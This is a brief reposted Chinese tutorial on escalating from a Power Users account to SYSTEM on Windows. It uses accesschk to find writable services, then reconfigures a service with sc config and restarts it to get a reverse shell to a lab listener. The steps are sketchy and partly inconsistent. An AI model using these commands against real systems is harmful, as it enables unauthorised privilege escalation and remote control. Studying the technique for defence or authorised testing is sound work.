用户test隶属于Power User组，  登入系统，IP为192.168.60.23，监听服务IP地址为192.168.60.19
用到的工具:工具：accesschk

执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息；  sc qc kdc查询kdc服务详细信息

查看系统启动的服务

修改参数binpath的值

执行sc config DcomLaunch obj= ".\LocalSystem" password= ""在重新启动DcomLaunch，在192.168.60.19监听的4433端口成功获取反弹，系统权限

转自：黑白之道